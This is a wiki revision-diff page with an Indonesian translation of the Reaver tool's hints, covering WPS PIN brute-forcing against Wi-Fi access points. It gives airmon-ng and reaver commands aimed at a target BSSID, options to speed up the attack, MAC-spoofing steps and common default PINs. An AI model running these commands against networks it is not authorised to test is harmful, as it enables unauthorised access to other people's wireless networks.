Difference between revisions of "Reaver: Hint dan Tip"

From OnnoWiki
Jump to navigation Jump to search
 
(5 intermediate revisions by the same user not shown)
Line 11: Line 11:
 
Set wireless card agar masuk ke mode monitor:
 
Set wireless card agar masuk ke mode monitor:
  
 +
airmon-ng check kill
 
  airmon-ng start wlan0
 
  airmon-ng start wlan0
  
Line 21: Line 22:
 
  # reaver -i mon0 -b 00:01:02:03:04:05 -vv
 
  # reaver -i mon0 -b 00:01:02:03:04:05 -vv
  
==Speeding Up the Attack==
+
==Mempercepat serangan==
  
By default, Reaver has a 1 second delay between pin attempts. You can disable this delay by adding '-d 0' on the command line, but some APs may not like it:
+
Secara default, Reaver ada 1 second delay antara pin attempts. Kita dapat men-disable dengan menambahkan '-d 0' tapi beberapa AP mungkin tidak akan suka ini:
  
  # reaver -i mon0 -b 00:01:02:03:04:05 -vv -d 0
+
  reaver -i mon0 -b 00:01:02:03:04:05 -vv -d 0
  
Another option that can speed up an attack is --dh-small. This option instructs Reaver to use small diffie-hellman secret numbers in order to reduce the computational load on the target AP:
+
Pilihan lain untuk bisa mempercepat serangan dengan --dh-small. Pilihan ini memerintahkan Reaver untuk menggunakan angka diffie-hellman secret yang kecil untuk mengecilkan beban komputasi di target AP:
  
  # reaver -i mon0 -b 00:01:02:03:04:05 -vv --dh-small
+
  reaver -i mon0 -b 00:01:02:03:04:05 -vv --dh-small
  
 
==MAC Spoofing==
 
==MAC Spoofing==
  
In some cases you may want/need to spoof your MAC address. Reaver supports MAC spoofing with the --mac option, but you must ensure that you have spoofed your MAC correctly in order for it to work.
+
Kadang kala, kita perlu men-spoof MAC address. Reaver mendukung MAC spoofing menggunakan perintah --mac option, pastikan kita men-spoof MAC dengan benar agar dapat bekerja.
  
Changing the MAC address of the virtual monitor mode interface (typically named mon0) WILL NOT WORK. You must change the MAC address of your wireless card's physical interface. For example:
+
Mengubah MAC address di interface virtual mode (misalnya mon0) TIDAK AKAN BISA. Kita perlu mengubah MAC address interface fisik. Contoh:
  
  # ifconfig wlan0 down
+
  ifconfig wlan0 down
  # ifconfig wlan0 hw ether 00:BA:AD:BE:EF:69
+
  ifconfig wlan0 hw ether 00:BA:AD:BE:EF:69
  # ifconfig wlan0 up
+
  ifconfig wlan0 up
  # airmon-ng start wlan0
+
  airmon-ng start wlan0
  # reaver -i mon0 -b 00:01:02:03:04:05 -vv --mac=00:BA:AD:BE:EF:69
+
  reaver -i mon0 -b 00:01:02:03:04:05 -vv --mac=00:BA:AD:BE:EF:69
 +
 
 +
==Default Pin==
 +
 
 +
Di laporkan bahwa beberapa vendor / ISP menggunakan default pin. Beberapa pin yang banyak digunakan antara lain adalah 12345670, 00005678, 01230000, dll. Reaver berusaha untuk mengetahui lebih dulu pin tersebut.
 +
 
 +
 
 +
==Error dan Warning==
  
==Default Pins==
+
Adalah biasa untuk mendapatkan beberapa kesalahan atau peringatan selama serangan, biasanya terkait dengan menerima timeout atau rusak pesan WPS. Anda bahkan mungkin mendapatkan peringatan ini selama beberapa menit sampai jumlah pin mulai dinaikan lagi.
  
It has been reported that some models/vendors/ISPs all come configured with a default pin. Common pins are 12345670, 00005678, 01230000, etc. Reaver attempts known default pins first.
+
Namun, jika jumlah pin anda tidak ada kenaikan sama sekali, atau kenaikan hanya kadang-kadang dengan banyak kesalahan / peringatan, coba jawab pertanyaan  berikut:
Errors and Warnings
 
  
It is not uncommon to get a few errors or warnings during the attack, usually related to receive timeouts or out of order WPS messages. You may even get these warnings for a few minutes until the pin count starts incrementing again.
+
* Apakah target AP mendukung WPS dan WPS enabled?
 +
* Apakah anda berhasil membuat wireless card masuk ke monitor mode?
 +
* Apakah anda menset monitor mode interface dengan -i option?
 +
* Apakah anda memperoleh sinyal yang baik dari AP?
  
However, if your pin count does not increment at all, or increments only occasionally with lots of errors/warnings, answer the following:
+
Jika anda masih mengalami masalah, anda dapat melihat apakah masalah anda sudah terdaftar dalam project issue tracker. Jika tidak, create new issue, dan pastikan untuk menyertakan:
  
* Does the target AP support WPS and is WPS enabled?
+
* Linux distro, distro version, dan architecture (32 bit atau 64bit?)
* Did you put your wireless card into monitor mode?
+
* Wireless card dan driver
* Did you specify the monitor mode interface with the -i option?
+
* Pcap file yang dapat demonstratikan issue, jika mungkin
* Do you have a good signal from the AP?
 
  
If you still have problems, you can see if your problem is already listed in the project issue tracker. If not, create a new issue, and be sure to include:
+
==Daftar Card yang bisa digunakan==
  
* Linux distro, distro version, and architecture (32 bit or 64bit?)
+
* http://www.aircrack-ng.org/doku.php?id=compatibility_drivers
* Wireless card and driver
 
* Pcap file demonstrating the issue, if possible
 

Latest revision as of 18:09, 12 December 2015

Sumber: http://code.google.com/p/reaver-wps/wiki/HintsAndTips

Syarat

  • Harus menggunakan Linux
  • Harus menggunakan wireless card yang mampu melakukan raw injection.
  • Harus bisa membuat wireless card anda menggunakan mode monitor.

Penggunaan

Set wireless card agar masuk ke mode monitor:

airmon-ng check kill
airmon-ng start wlan0

Jalankan Reaver, tentukan BSSID dari targat AP dan nama dari monitor mode interface (biasanya 'mon0', bukan 'wlan0'):

reaver -i mon0 -b 00:01:02:03:04:05

Coba juga -vv agar lebih banyak informasi yang dikeluarkan

# reaver -i mon0 -b 00:01:02:03:04:05 -vv

Mempercepat serangan

Secara default, Reaver ada 1 second delay antara pin attempts. Kita dapat men-disable dengan menambahkan '-d 0' tapi beberapa AP mungkin tidak akan suka ini:

reaver -i mon0 -b 00:01:02:03:04:05 -vv -d 0

Pilihan lain untuk bisa mempercepat serangan dengan --dh-small. Pilihan ini memerintahkan Reaver untuk menggunakan angka diffie-hellman secret yang kecil untuk mengecilkan beban komputasi di target AP:

reaver -i mon0 -b 00:01:02:03:04:05 -vv --dh-small

MAC Spoofing

Kadang kala, kita perlu men-spoof MAC address. Reaver mendukung MAC spoofing menggunakan perintah --mac option, pastikan kita men-spoof MAC dengan benar agar dapat bekerja.

Mengubah MAC address di interface virtual mode (misalnya mon0) TIDAK AKAN BISA. Kita perlu mengubah MAC address interface fisik. Contoh:

ifconfig wlan0 down
ifconfig wlan0 hw ether 00:BA:AD:BE:EF:69
ifconfig wlan0 up
airmon-ng start wlan0
reaver -i mon0 -b 00:01:02:03:04:05 -vv --mac=00:BA:AD:BE:EF:69

Default Pin

Di laporkan bahwa beberapa vendor / ISP menggunakan default pin. Beberapa pin yang banyak digunakan antara lain adalah 12345670, 00005678, 01230000, dll. Reaver berusaha untuk mengetahui lebih dulu pin tersebut.


Error dan Warning

Adalah biasa untuk mendapatkan beberapa kesalahan atau peringatan selama serangan, biasanya terkait dengan menerima timeout atau rusak pesan WPS. Anda bahkan mungkin mendapatkan peringatan ini selama beberapa menit sampai jumlah pin mulai dinaikan lagi.

Namun, jika jumlah pin anda tidak ada kenaikan sama sekali, atau kenaikan hanya kadang-kadang dengan banyak kesalahan / peringatan, coba jawab pertanyaan berikut:

  • Apakah target AP mendukung WPS dan WPS enabled?
  • Apakah anda berhasil membuat wireless card masuk ke monitor mode?
  • Apakah anda menset monitor mode interface dengan -i option?
  • Apakah anda memperoleh sinyal yang baik dari AP?

Jika anda masih mengalami masalah, anda dapat melihat apakah masalah anda sudah terdaftar dalam project issue tracker. Jika tidak, create new issue, dan pastikan untuk menyertakan:

  • Linux distro, distro version, dan architecture (32 bit atau 64bit?)
  • Wireless card dan driver
  • Pcap file yang dapat demonstratikan issue, jika mungkin

Daftar Card yang bisa digunakan